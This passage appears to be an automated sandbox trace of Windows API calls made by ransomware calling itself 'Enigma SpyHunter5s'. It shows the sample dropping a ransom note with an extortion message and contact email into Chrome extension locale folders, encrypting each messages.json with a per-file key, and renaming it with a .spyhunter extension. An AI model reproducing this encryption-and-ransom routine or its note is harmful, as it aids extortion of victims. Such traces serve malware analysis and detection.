data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.257] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.257] WriteFile (in: hFile=0xa0, lpBuffer=0x248eadb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec04, lpOverlapped=0x0 | out: lpBuffer=0x248eadb*, lpNumberOfBytesWritten=0x248ec04*=0x127, lpOverlapped=0x0) returned 1 [0160.258] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.258] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec04*=0x2ac, lpOverlapped=0x0) returned 1 [0160.258] CloseHandle (hObject=0xa0) returned 1 [0160.258] GetProcessHeap () returned 0x2c0000 [0160.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f730 | out: hHeap=0x2c0000) returned 1 [0160.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.259] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.259] WriteFile (in: hFile=0xa0, lpBuffer=0x248ead7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec00, lpOverlapped=0x0 | out: lpBuffer=0x248ead7*, lpNumberOfBytesWritten=0x248ec00*=0x127, lpOverlapped=0x0) returned 1 [0160.260] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.260] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec00*=0x2ac, lpOverlapped=0x0) returned 1 [0160.260] CloseHandle (hObject=0xa0) returned 1 [0160.260] GetProcessHeap () returned 0x2c0000 [0160.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e1a0 | out: hHeap=0x2c0000) returned 1 [0160.261] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eba0 | out: pbBuffer=0x248eba0) returned 1 [0160.261] GetProcessHeap () returned 0x2c0000 [0160.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb98*=0x30) returned 1 [0160.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json") returned 155 [0160.262] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.262] GetProcessHeap () returned 0x2c0000 [0160.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.262] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eb5c*=0x119, lpOverlapped=0x0) returned 1 [0160.263] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.263] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x248eb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eb5c*=0x119, lpOverlapped=0x0) returned 1 [0160.263] GetProcessHeap () returned 0x2c0000 [0160.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.263] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.263] WriteFile (in: hFile=0xa0, lpBuffer=0x248eb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb5c, lpOverlapped=0x0 | out: lpBuffer=0x248eb9c*, lpNumberOfBytesWritten=0x248eb5c*=0x4, lpOverlapped=0x0) returned 1 [0160.263] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb5c*=0x30, lpOverlapped=0x0) returned 1 [0160.263] CloseHandle (hObject=0xa0) returned 1 [0160.263] GetProcessHeap () returned 0x2c0000 [0160.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.263] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.spyhunter") returned 165 [0160.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.spyhunter")) returned 1 [0160.264] GetProcessHeap () returned 0x2c0000 [0160.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.265] GetProcessHeap () returned 0x2c0000 [0160.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.265] GetProcessHeap () returned 0x2c0000 [0160.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e018 | out: hHeap=0x2c0000) returned 1 [0160.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.265] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.265] WriteFile (in: hFile=0xa0, lpBuffer=0x248eacf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ebf8, lpOverlapped=0x0 | out: lpBuffer=0x248eacf*, lpNumberOfBytesWritten=0x248ebf8*=0x127, lpOverlapped=0x0) returned 1 [0160.266] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.266] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ebf8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ebf8*=0x2ac, lpOverlapped=0x0) returned 1 [0160.266] CloseHandle (hObject=0xa0) returned 1 [0160.267] GetProcessHeap () returned 0x2c0000 [0160.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6de90 | out: hHeap=0x2c0000) returned 1 [0160.267] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb98 | out: pbBuffer=0x248eb98) returned 1 [0160.267] GetProcessHeap () returned 0x2c0000 [0160.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.267] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb90*=0x30) returned 1 [0160.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.268] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json") returned 155 [0160.268] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.268] GetProcessHeap () returned 0x2c0000 [0160.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.268] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eb54*=0xaf, lpOverlapped=0x0) returned 1 [0160.268] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff51, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.269] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xaf, lpNumberOfBytesWritten=0x248eb54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eb54*=0xaf, lpOverlapped=0x0) returned 1 [0160.269] GetProcessHeap () returned 0x2c0000 [0160.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.269] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.269] WriteFile (in: hFile=0xa0, lpBuffer=0x248eb94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb54, lpOverlapped=0x0 | out: lpBuffer=0x248eb94*, lpNumberOfBytesWritten=0x248eb54*=0x4, lpOverlapped=0x0) returned 1 [0160.269] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb54, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb54*=0x30, lpOverlapped=0x0) returned 1 [0160.269] CloseHandle (hObject=0xa0) returned 1 [0160.269] GetProcessHeap () returned 0x2c0000 [0160.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.269] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.spyhunter") returned 165 [0160.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.spyhunter")) returned 1 [0160.270] GetProcessHeap () returned 0x2c0000 [0160.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.270] GetProcessHeap () returned 0x2c0000 [0160.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.270] GetProcessHeap () returned 0x2c0000 [0160.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6dd08 | out: hHeap=0x2c0000) returned 1 [0160.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.271] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.272] WriteFile (in: hFile=0xa0, lpBuffer=0x248eac7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ebf0, lpOverlapped=0x0 | out: lpBuffer=0x248eac7*, lpNumberOfBytesWritten=0x248ebf0*=0x127, lpOverlapped=0x0) returned 1 [0160.272] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.272] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ebf0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ebf0*=0x2ac, lpOverlapped=0x0) returned 1 [0160.273] CloseHandle (hObject=0xa0) returned 1 [0160.273] GetProcessHeap () returned 0x2c0000 [0160.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f19e60 | out: hHeap=0x2c0000) returned 1 [0160.273] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eb90 | out: pbBuffer=0x248eb90) returned 1 [0160.273] GetProcessHeap () returned 0x2c0000 [0160.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.273] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eb88*=0x30) returned 1 [0160.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.274] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json") returned 158 [0160.274] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.274] GetProcessHeap () returned 0x2c0000 [0160.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.274] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eb4c*=0xc6, lpOverlapped=0x0) returned 1 [0160.275] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.275] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x248eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eb4c*=0xc6, lpOverlapped=0x0) returned 1 [0160.275] GetProcessHeap () returned 0x2c0000 [0160.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.275] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.275] WriteFile (in: hFile=0xa0, lpBuffer=0x248eb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb4c, lpOverlapped=0x0 | out: lpBuffer=0x248eb8c*, lpNumberOfBytesWritten=0x248eb4c*=0x4, lpOverlapped=0x0) returned 1 [0160.275] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb4c*=0x30, lpOverlapped=0x0) returned 1 [0160.275] CloseHandle (hObject=0xa0) returned 1 [0160.276] GetProcessHeap () returned 0x2c0000 [0160.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.276] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.spyhunter") returned 168 [0160.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.spyhunter")) returned 1 [0160.277] GetProcessHeap () returned 0x2c0000 [0160.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.277] GetProcessHeap () returned 0x2c0000 [0160.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.277] GetProcessHeap () returned 0x2c0000 [0160.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0160.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 